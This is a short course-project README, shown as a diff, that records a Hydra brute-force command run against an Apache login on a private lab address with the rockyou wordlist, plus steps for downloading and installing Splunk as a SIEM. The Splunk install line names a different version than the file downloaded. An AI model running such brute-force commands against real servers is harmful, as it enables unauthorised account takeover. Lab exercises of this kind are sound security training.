Haz8800/ICS344-Project-Commands-and-codes/README.md

 -using kali tools we managed to brute force our apache server using hydra tool with the following code hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.206.129 -s 8080 http-get /

+#7- SIEM dashboard (SPLUNK)

+-after accessing their website and signing up we obtained this link (wget -O splunk-9.3.2-d8bb32809498-linux-2.6-amd64.deb "https://download.splunk.com/products/splunk/releases/9.3.2/linux/splunk-9.3.2-d8bb32809498-linux-2.6-amd64.deb") you can run this in the terminal in kali linux

+-after finishing that run the command sudo dpkg -i splunk-8.x.x-xxxxxx-linux-2.6-amd64.deb to extract and install it

+#THAT'S IT